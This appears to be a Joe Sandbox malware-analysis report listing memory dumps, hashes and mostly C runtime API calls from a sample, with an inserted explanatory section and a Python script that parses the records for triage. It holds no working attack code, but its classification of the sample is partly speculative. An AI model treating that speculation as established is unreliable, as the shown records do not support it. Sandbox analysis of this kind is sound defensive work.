                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1096550386-0
                                                                                                                  • Opcode ID: 9baf3e48ae8b97a8198f8d5bb7064e6a8c78925ca85400659604db514eddfbd5
                                                                                                                  • Instruction ID: 054fac9b009c71e15bc6ef15feee8a238d2110df2e5fdbb6940fb179d5576821
                                                                                                                  • Opcode Fuzzy Hash: 9baf3e48ae8b97a8198f8d5bb7064e6a8c78925ca85400659604db514eddfbd5
                                                                                                                  • Instruction Fuzzy Hash: 3351BFB2601246AFEF216F65CC81EBB7AA9EF96B10F190129FD05E6151EF30DD10A770
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                   • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseFileHandleSize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3849164406-0
                                                                                                                  • Opcode ID: b4da3247686a4ea24307aef47fef77df224a25c53c3484fe273df1dad5d18e93
                                                                                                                  • Instruction ID: d36972b7b1b45452316c96974dc5d16a88178b67316fb41438f00e4ea8c49c43
                                                                                                                  • Opcode Fuzzy Hash: b4da3247686a4ea24307aef47fef77df224a25c53c3484fe273df1dad5d18e93
                                                                                                                  • Instruction Fuzzy Hash: F4719DB4D04648CFDB10EFA8D588B9DBBF0BF48314F508529E499AB345D734A949CF62
                                                                                                                  APIs
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00D8BB1B
                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00DA7328,000000FF,?,00D8892E), ref: 00D8BB3A
                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00DA7328,000000FF,?,00D8892E), ref: 00D8BB68
                                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00DA7328,000000FF,?,00D8892E), ref: 00D8BBC3
                                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00DA7328,000000FF,?,00D8892E), ref: 00D8BBDA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                   • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 66001078-0
                                                                                                                  • Opcode ID: 72d9beab925a8e3014d9044b3d5e3ca21e842fc8886a68301225fb7be935f00a
                                                                                                                  • Instruction ID: 4a2b629674e56c22525ee5005967baaa2467f76b1821862f02a7dc57c9a7283e
                                                                                                                  • Opcode Fuzzy Hash: 72d9beab925a8e3014d9044b3d5e3ca21e842fc8886a68301225fb7be935f00a
                                                                                                                  • Instruction Fuzzy Hash: 3341277590060ADFCB20EF65C4909AAB3F4FF08360B584A6BE496D7654DB30F985CB71
                                                                                                                  APIs
                                                                                                                  • __EH_prolog3.LIBCMT ref: 00D894C6
                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00D894D1
                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00D8953F
                                                                                                                    • Part of subcall function 00D893C8: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00D893E0
                                                                                                                  • std::locale::_Setgloballocale.LIBCPMT ref: 00D894EC
                                                                                                                  • _Yarn.LIBCPMT ref: 00D89502
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                   • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1088826258-0
                                                                                                                  • Opcode ID: fe085558b9bbbcac418db3ff29aa5df3de177dd4d3c7933e5f348f865aaa2295
                                                                                                                  • Instruction ID: 36927654b3212abf823048b1a7bafe2152779ea13c336f6bb57befb803698d3c
                                                                                                                  • Opcode Fuzzy Hash: fe085558b9bbbcac418db3ff29aa5df3de177dd4d3c7933e5f348f865aaa2295
                                                                                                                  • Instruction Fuzzy Hash: 0A01BC75A00211EBC706FB20D86957DBBA1FF85320B184149E84197381DF34AA42CBB1
                                                                                                                  APIs
                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00DA1C4D,00000000,?,00DB40C8,?,?,?,00DA1B84,00000004,InitializeCriticalSectionEx,00DAB2A4,00DAB2AC), ref: 00DA1BBE
                                                                                                                  • GetLastError.KERNEL32(?,00DA1C4D,00000000,?,00DB40C8,?,?,?,00DA1B84,00000004,InitializeCriticalSectionEx,00DAB2A4,00DAB2AC,00000000,?,00D9702C), ref: 00DA1BC8
                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00DA1BF0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                   • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                  • String ID: api-ms-
                                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                                  • Opcode ID: f716b28ee99058d48d0ac170e28c1b21b20cdfd17ff09214755a2402ca0f6f8d
                                                                                                                  • Instruction ID: f9bba14c2eb3cfcfd0144484d5e21db8f5e8298557f979501139dbe6055c02c1
                                                                                                                  • Opcode Fuzzy Hash: f716b28ee99058d48d0ac170e28c1b21b20cdfd17ff09214755a2402ca0f6f8d
                                                                                                                  • Instruction Fuzzy Hash: 54E04F30685309FBFF102B61EC06F5E3F58AB12B91F184021F90DE81E2EB61D9509AB4
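The record above (two LoadLibraryExW calls around a GetLastError, with the third argument `00000800` on the first call and `00000000` on the retry, the string `api-ms-` and the literal `InitializeCriticalSectionEx` on the stack) looks like the Visual C++ runtime's lazy WinAPI binding helper rather than stealer logic, and the earlier `std::_Lockit` / `std::locale` record is LIBCMT/LIBCPMT runtime code outright. `0x800` is the documented `LOAD_LIBRARY_SEARCH_SYSTEM32` flag, so the first load is pinned to System32 and the unrestricted retry only runs after that attempt fails. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses records in this listing's line format into structured calls, decodes `LoadLibraryExW` flag values, and marks records whose calls all come from `LIBCMT`/`LIBCPMT`. The two sample records are constructed from lines in this section, the flag values come from the public `LoadLibraryExW` documentation, and treating LIBCMT/LIBCPMT-only records as CRT noise is this example's own assumption.

```python
"""Parse Joe Sandbox IDA-plugin "APIs" records and decode LoadLibraryExW flags.

Added example, not part of the Joe Sandbox report or its tooling.  The two
sample records are constructed from lines in the listing; the flag names and
values come from the public LoadLibraryExW documentation.  Treating
LIBCMT/LIBCPMT-only records as CRT noise is an assumption of this example.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed samples in the report's own line format.
SAMPLE_LOADLIBRARY = """\
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00DA1C4D,00000000,?,00DB40C8,?,?,?,00DA1B84,00000004,InitializeCriticalSectionEx,00DAB2A4,00DAB2AC), ref: 00DA1BBE
• GetLastError.KERNEL32(?,00DA1C4D,00000000,?,00DB40C8,?,?,?,00DA1B84,00000004,InitializeCriticalSectionEx,00DAB2A4,00DAB2AC,00000000,?,00D9702C), ref: 00DA1BC8
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00DA1BF0
"""
SAMPLE_LOCALE = """\
APIs
• __EH_prolog3.LIBCMT ref: 00D894C6
• std::_Lockit::_Lockit.LIBCPMT ref: 00D894D1
• std::_Lockit::~_Lockit.LIBCPMT ref: 00D8953F
  • Part of subcall function 00D893C8: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00D893E0
• std::locale::_Setgloballocale.LIBCPMT ref: 00D894EC
• _Yarn.LIBCPMT ref: 00D89502
"""

# "• Name.MODULE(arg,arg,...), ref: ADDR" or the argument-less "• Name.MODULE ref: ADDR".
# Names may contain C++ scope operators and destructor tildes.
CALL_RE = re.compile(
    r"•\s*(?P<name>[\w:~]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
SUBCALL_RE = re.compile(r"Part of subcall function\s+[0-9A-Fa-f]+:\s*")

# dwFlags values from libloaderapi.h, as documented for LoadLibraryExW.
LOAD_LIBRARY_FLAGS = {
    0x0001: "DONT_RESOLVE_DLL_REFERENCES", 0x0002: "LOAD_LIBRARY_AS_DATAFILE",
    0x0008: "LOAD_WITH_ALTERED_SEARCH_PATH", 0x0010: "LOAD_IGNORE_CODE_AUTHZ_LEVEL",
    0x0020: "LOAD_LIBRARY_AS_IMAGE_RESOURCE", 0x0040: "LOAD_LIBRARY_AS_DATAFILE_EXCLUSIVE",
    0x0080: "LOAD_LIBRARY_REQUIRE_SIGNED_TARGET", 0x0100: "LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR",
    0x0200: "LOAD_LIBRARY_SEARCH_APPLICATION_DIR", 0x0400: "LOAD_LIBRARY_SEARCH_USER_DIRS",
    0x0800: "LOAD_LIBRARY_SEARCH_SYSTEM32", 0x1000: "LOAD_LIBRARY_SEARCH_DEFAULT_DIRS",
    0x2000: "LOAD_LIBRARY_SAFE_CURRENT_DIRS",
}
CRT_MODULES = {"LIBCMT", "LIBCPMT"}   # assumption: static C / C++ runtime noise


@dataclass
class ApiCall:
    name: str
    module: str
    args: list             # int for hex operands, None for "?", str for literals
    ref: int               # call-site address
    subcall: bool = False  # the report attributes the call to a callee


def parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None
    try:
        return int(tok, 16)     # "00000800" -> 0x800, "-00000008" -> -8
    except ValueError:
        return tok              # e.g. InitializeCriticalSectionEx


def parse_record(text: str) -> list[ApiCall]:
    """Turn one record's API lines into ApiCall objects; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        subcall = bool(SUBCALL_RE.search(line))
        m = CALL_RE.search(SUBCALL_RE.sub("", line))
        if not m:
            continue
        raw = m.group("args")
        args = [parse_arg(a) for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             int(m.group("ref"), 16), subcall))
    return calls


def decode_loadlibrary_flags(flags: int) -> list[str]:
    """Expand a dwFlags value into flag names, keeping any undocumented bits visible."""
    names = [n for bit, n in LOAD_LIBRARY_FLAGS.items() if flags & bit]
    unknown = flags & ~sum(LOAD_LIBRARY_FLAGS)
    if unknown:
        names.append(f"UNKNOWN_0x{unknown:X}")
    return names


def loadlibrary_search_policy(calls: list[ApiCall]) -> list[tuple[int, list[str]]]:
    """(call site, decoded flags) for each LoadLibraryExW call.
    The argument order is (lpLibFileName, hFile, dwFlags), so dwFlags is args[2]."""
    return [(c.ref, decode_loadlibrary_flags(c.args[2])) for c in calls
            if c.name == "LoadLibraryExW" and len(c.args) >= 3
            and isinstance(c.args[2], int)]


def summarize(calls: list[ApiCall]) -> dict:
    """Per-record triage facts: call count, distinct APIs, CRT-only, subcall present."""
    modules = {c.module for c in calls}
    return {
        "calls": len(calls),
        "unique_apis": sorted({c.name for c in calls}),
        "crt_only": bool(calls) and modules <= CRT_MODULES,
        "has_subcall": any(c.subcall for c in calls),
    }


if __name__ == "__main__":
    for text in (SAMPLE_LOADLIBRARY, SAMPLE_LOCALE):
        calls = parse_record(text)
        print(summarize(calls), loadlibrary_search_policy(calls))
```

Run against the two sample records, the first decodes to `LOAD_LIBRARY_SEARCH_SYSTEM32` at `00DA1BBE` and no flags at `00DA1BF0`, which is the search-order-restricting attempt followed by the unrestricted fallback; the second is reported as CRT-only, so a reviewer working through the listing can skip it and spend time on records whose KERNEL32 calls are not runtime plumbing.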
                                                                                                                  APIs
                                                                                                                  • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00D9F36C
                                                                                                                    • Part of subcall function 00D97491: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D98CE1,?,00000000,-00000008), ref: 00D974F2
                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D9F5BE
                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00D9F604
                                                                                                                  • GetLastError.KERNEL32 ref: 00D9F6A7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                   • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2112829910-0
                                                                                                                  • Opcode ID: 3e993a70e924f527f98456c6c58face802228d08a03908e8db4fc86ea1170ff2
                                                                                                                  • Instruction ID: 269be6e52615b882b0cc585c6779064c4fca898b6571cebe82f407c471ac4a71
                                                                                                                  • Opcode Fuzzy Hash: 3e993a70e924f527f98456c6c58face802228d08a03908e8db4fc86ea1170ff2
                                                                                                                  • Instruction Fuzzy Hash: 2BD14975D00258EFCF15CFA8D8809AEBBB5FF49314F28456AE865EB352D630E941CB60
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                   • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AdjustPointer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1740715915-0
                                                                                                                  • Opcode ID: 090b6f0b512c26b8808fc8293638a69c18d12611ba49fac5e84e43d6be5eede8
                                                                                                                  • Instruction ID: e59d74052eaf4aeb701b44971657424896e7ff8f4fd31a6f9b6ad292b521f51e
                                                                                                                  • Opcode Fuzzy Hash: 090b6f0b512c26b8808fc8293638a69c18d12611ba49fac5e84e43d6be5eede8
                                                                                                                  • Instruction Fuzzy Hash: 4051BF76A00206EFEF299F91D851BBAB7A4EF04B14F18452DE845876D1E731EC80CBB0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D97491: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D98CE1,?,00000000,-00000008), ref: 00D974F2
                                                                                                                  • GetLastError.KERNEL32 ref: 00D9D199
                                                                                                                  • __dosmaperr.LIBCMT ref: 00D9D1A0
                                                                                                                  • GetLastError.KERNEL32 ref: 00D9D1DA
                                                                                                                  • __dosmaperr.LIBCMT ref: 00D9D1E1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                   • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1913693674-0
                                                                                                                  • Opcode ID: 233db2b963efd57eeca43dfa7019cbd5fcf5551749c590d566727f98447ff958
                                                                                                                  • Instruction ID: d1a7083fa3184a81d9d215e3fbb70d616e0f750529b803e911f2b4275ebaa60e
                                                                                                                  • Opcode Fuzzy Hash: 233db2b963efd57eeca43dfa7019cbd5fcf5551749c590d566727f98447ff958
                                                                                                                  • Instruction Fuzzy Hash: 6B219F72700305AFDF21AF6A8C8096BB7AAFF443A47148519F959A7251DB30ED40CBB0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                   • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d6632d0c43cc60cfa8f6adc5de762a7216655ea3068becb9dbdaf4aebe82fede
                                                                                                                  • Instruction ID: 3ba9842fda5c4324ca8e6db3d3e04f64bba3ea26611249405f069a5415012712
                                                                                                                  • Opcode Fuzzy Hash: d6632d0c43cc60cfa8f6adc5de762a7216655ea3068becb9dbdaf4aebe82fede
                                                                                                                  • Instruction Fuzzy Hash: 3321A931604215BF9B28FF658C8096BB7A9FF40B647198A25F85AD7251EB30ED019FB0
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 00D9E533
  • Part of subcall function 00D97491: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D98CE1,?,00000000,-00000008), ref: 00D974F2
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D9E56B
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D9E58B
Memory Dump Source
• Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
• Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID: EnvironmentStrings$Free$ByteCharMultiWide
• String ID:
• API String ID: 158306478-0
APIs
• std::_Throw_Cpp_error.LIBCPMT ref: 00D816BD
• GetCurrentThreadId.KERNEL32 ref: 00D816CB
• std::_Throw_Cpp_error.LIBCPMT ref: 00D816E4
• std::_Throw_Cpp_error.LIBCPMT ref: 00D81723
Memory Dump Source
• Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID: Cpp_errorThrow_std::_$CurrentThread
• String ID:
• API String ID: 2261580123-0
APIs
• __EH_prolog3.LIBCMT ref: 00D8AA68
• std::_Lockit::_Lockit.LIBCPMT ref: 00D8AA72
  • Part of subcall function 00D84080: std::_Lockit::_Lockit.LIBCPMT ref: 00D840AE
  • Part of subcall function 00D84080: std::_Lockit::~_Lockit.LIBCPMT ref: 00D840D9
• codecvt.LIBCPMT ref: 00D8AAAC
• std::_Lockit::~_Lockit.LIBCPMT ref: 00D8AAE3
Memory Dump Source
• Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
• String ID:
• API String ID: 3716348337-0
APIs
• WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00DA554F,00000000,00000001,00000000,?,?,00D9F6FB,?,00000000,00000000), ref: 00DA6077
• GetLastError.KERNEL32(?,00DA554F,00000000,00000001,00000000,?,?,00D9F6FB,?,00000000,00000000,?,?,?,00D9F041,00000000), ref: 00DA6083
  • Part of subcall function 00DA60D4: CloseHandle.KERNEL32(FFFFFFFE,00DA6093,?,00DA554F,00000000,00000001,00000000,?,?,00D9F6FB,?,00000000,00000000,?,?), ref: 00DA60E4
• ___initconout.LIBCMT ref: 00DA6093
  • Part of subcall function 00DA60B5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00DA6051,00DA553C,?,?,00D9F6FB,?,00000000,00000000,?), ref: 00DA60C8
• WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00DA554F,00000000,00000001,00000000,?,?,00D9F6FB,?,00000000,00000000,?), ref: 00DA60A8
Memory Dump Source
• Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
• String ID:
• API String ID: 2744216297-0
APIs
• GetSystemTimeAsFileTime.KERNEL32(?), ref: 00D8C379
• GetCurrentThreadId.KERNEL32 ref: 00D8C388
• GetCurrentProcessId.KERNEL32 ref: 00D8C391
• QueryPerformanceCounter.KERNEL32(?), ref: 00D8C39E
Memory Dump Source
• Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID: _strcspn
• String ID: @
• API String ID: 3709121408-2766056989
APIs
• EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00D96CFF,?,?,00000000,00000000,00000000,?), ref: 00D96E23
Strings
Memory Dump Source
• Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
Similarity
• API ID: EncodePointer
• String ID: MOC$RCC
• API String ID: 2118026453-2084237596
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
Similarity
• API ID: InitVariant
• String ID: N$]
• API String ID: 1927566239-1635235127
APIs
• ___except_validate_context_record.LIBVCRUNTIME ref: 00D968E1
Strings
Memory Dump Source
• Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
